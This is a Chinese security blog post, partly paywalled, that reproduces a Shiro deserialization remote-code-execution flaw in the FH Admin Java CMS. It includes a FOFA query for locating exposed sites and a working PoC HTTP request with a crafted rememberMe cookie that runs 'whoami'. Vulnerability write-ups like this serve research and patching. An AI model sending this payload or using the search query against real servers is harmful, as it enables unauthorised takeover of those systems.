FH Admin Shiro反序列化漏洞复现

已于 2023-12-02 15:59:55 修改
阅读量1.4k 收藏 8
点赞数 9
CC 4.0 BY-SA版权
分类专栏: 漏洞复现v1 文章标签: 安全 web安全
于 2023-12-02 01:51:04 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/134746664
本文介绍了FH Admin CMS的Shiro反序列化漏洞,详细阐述了漏洞产生的原因,提供了复现环境及PoC,并给出修复建议。通过利用硬编码的shiro-key,攻击者能执行任意代码,获取服务器权限。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

0x01 产品简介

  FH Admin 是一款 java 快速开发平台。

0x02 漏洞概述

 FH Admin CMS 存在 shiro 反序列化漏洞,该漏洞源于软件存在硬编码的 shiro-key,攻击者可利用该 key 生成恶意的序列化数据,在服务器上执行任意代码,执行系统命令、或打入内存马等,获取服务器权限。

0x03 复现环境

FOFA:app="FH-Admin"

0x04 漏洞复现 

PoC

GET /appSysUser/registerSysUser.do HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
X-Token-Data: whoami
Cookie: rememberMe=RjI4NWNFQzBDZTVGNWNBM6ByNoG5jvpzbQqTkz2zP8GLkE05HSQI3cfp4VAgaPDcrRrjkpJu9jMhqPwCVC7PctiZQKqpVMs1MpWDU+QNSulwceEdncBKO8H/3euOC5R6IBRF
了解本专栏 订阅专栏 解锁全文 超级会员免费看
详细整合教程(Spring+SpringMVC+MyBatis)
luoyangscs的博客
01-26 1193
获取【下载地址】   QQ: 313596790   【免费支持更新】 A 代码生成器(开发利器);       增删改查的处理类,service层,mybatis的xml,SQL( mysql   和oracle)脚本,   jsp页面 都生成    就不用写搬砖的代码了,生成的放到项目里,可以直接运行 B 阿里巴巴数据库连接池druid;   数据库连接池  阿里巴巴的 drui
java SSM 框架 微信自定义菜单 快递接口 SpringMVC mybatis redis shiro
qq_38204379的博客
04-06 1352
A 调用摄像头拍照,自定义裁剪编辑头像,头像图片色度调节 B 集成代码生成器 [正反双向](单表、主表、明细表、树形表,快速开发利器)+快速表单构建器 freemaker模版技术 ,0个代码不用写,生成完整的一个模块,带页面、建表sql脚本,处理类,service等完整模块 C 集成阿里巴巴数据库连接池druid  数据库连接池  阿里巴巴的 druid。Druid在监控、可扩展性
FH Admin 自动分页问题
小小城的博客
08-26 1412
首先是下图这个问题,数据正常、无法分页 造成这种情况的原因是sql命名问题,首先我们看一下下图的mybatis的配置文件 FH Admin会对以listPage结尾的sql进行自动的分页也就是下面这种样式的sql <select id="getByBlackListlistPage" parameterType="page" resu...
FH Admin fhadmin
chiluyin1426的博客
08-22 518
转载于:https://my.oschina.net/fhadmin/blog/1518345
fh admin mysql版本_centos7 安装 mysql 数据库详解
weixin_42602726的博客
02-03 257
首先进入root超级用户因为centos7中默认安装 mariadb数据所以要先查出安装的数据库版本,并肩数据库卸载掉rpm -qa | grep mariadbyum remove mariadb-XXX将显示的都删除安装mysql要下载三个包,wget http://cdn.mysql.com//Downloads/MySQL-5.6/MySQL-server-5.6.29-1.el7.x86...
FH Admin fhadmn 源码项目下载获取 Java后台 springmvc mybatis SSM
08-02 576
获取【下载地址】QQ: 313596790 官网 http://www.fhadmin.org/ A代码编辑器,在线模版编辑,仿开发工具编辑器,pdf在线预览,文件转换编码 B 集成代码生成器 [正反双向...
shiro 反序列化漏洞综合利用工具 shiro_attack_by J1anfen
11-05
在提到的 "shiro_attack_by J1anfen" 工具中,重点是针对 Apache Shiro 的一个特定安全问题:反序列化漏洞反序列化漏洞通常出现在程序中,当接收到从网络或持久存储中读取的数据,并将其转换回原来的对象实例时...
shiro反序列化漏洞暴力破解漏洞检测工具
09-14
1.shiro反序列化漏洞、暴力破解漏洞检测工具源码 2.shiro反序列化漏洞、暴力破解漏洞检测工具jar包 3.shiro反序列化漏洞、暴力破解漏洞检测工具启动方法 4.shiro反序列化漏洞、暴力破解漏洞检测工具使用方法 5.shiro...
shiro反序列化漏洞利用工具
11-09
图形化界面,该工具支持漏洞检测,请勿用作非法途径,否则后果自负。 Shiro550无需提供rememberMe Cookie,Shiro721需要提供一个有效的rememberMe Cookie 可以手工指定特定的 Key/Gadget/EchoType(支持多选),如果...
Shiro反序列化漏洞检测工具
01-05
Shiro的早期版本中,尤其是1.2.4及以下版本,存在一个严重的反序列化漏洞,这个漏洞可能导致远程代码执行(RCE)的风险,攻击者可以利用这个漏洞对目标系统进行非法操作。 反序列化漏洞通常出现在应用程序接收到...
Fh分销源码
03-27
自己在官网替换代码就行了
java自动生成全套代码项目,可直接生成页面
08-20
不知道怎么上传系统图片,java自动生成jsp,controller,service及实现类,mapper,操作简单,只需要自己在系统管理-代码生成里面进行操作即可,系统最后会导出具体操作文档,内自带mysql数据库脚本,源码需要在Tomcat7+jdk1.7环境下运行,ide可以支持主流的idea,eclipse,myeclipse,其它的我还没试过,绝对值得下载,登录用户名密码压缩文件中有,有不懂的可以留言我
CountSet.java
08-22
高效的计数器代码,使用Java编写,留作存档
fh admin mysql版本,SpringBoot 2.4.0 版本之后跨域的问题 处理
weixin_33840959的博客
03-19 110
package com.clickpaas.config;import org.springframework.context.annotation.Bean;import org.springframework.context.annotation.Configuration;import org.springframework.web.cors.CorsConfiguration;import...
springboot 全局异常拦截器,友好异常提示
07-24 1059
1. 添加config 配置类 package org.fh.config; import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; import org.springframework.context.annotation.Configuration; import org.springframework.web.servlet.HandlerExceptionRes
websocket.js
weixin_30920597的博客
08-11 219
var websocket;var isCreatw = false;var title="";var win;var input;var isQj = true;var toUser="";function toUserMsg(toU){ if((!isQj && toUser == toU) || toU == user){ win.setTitl...
疯了..Spring 再爆惊天大漏洞。。
Java技术栈,分享最主流的Java技术
04-01 674
Spring 官宣高危漏洞 大家好,我是栈长。 前几天爆出来的 Spring 漏洞,刚修复完又来? 今天愚人节来了,这是和大家开玩笑吗? 不是的,我也是猝不及防!这个玩笑也开的太大了!! 你之前看到的这个漏洞已经是过去式了: 我以为是终点,没想到只是起点,现在 Spring 又官宣了最新的高危漏洞: Early Announcement??这只是一个早期的公告?可能还有中期?后期?往下面继续看就知道了! 漏洞详情 漏洞 CVE-2022-22965 漏洞名称 远程代码执行漏洞 严重级别
[代码审计] fengcms1.32从详细漏洞分析到漏洞利用
PANDA墨森的博客
12-20 766
##前言 这是我在此发表的第一篇代码审计的文章,仅供学习参考!首发于哈拉少安全小队微信公众号 一、Cms初识: FengCms——由地方网络工作室基于PHP+MYSQL开发。是一款开源的网站内容管理系统。系统支持自由订制模型,你完全可以用FengCms打造一个你想要的任意展示模型。模版和程序分离、自由标签系统,让FengCms灵活无比。拥有FengCms,你可以完成国内95%的网站制作需要! -目录结构: 二、漏洞描述: 在fengcms的安装程序中,由于安装...
Shiro反序列化漏洞复现工具包解析
本文将详细介绍Shiro反序列化漏洞的概念、影响、复现方法及相关防御策略。 ### Shiro反序列化漏洞概念 Shiro反序列化漏洞主要发生在使用Shiro进行用户身份认证和会话管理的过程中。当应用系统将Shiro的Session对象...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值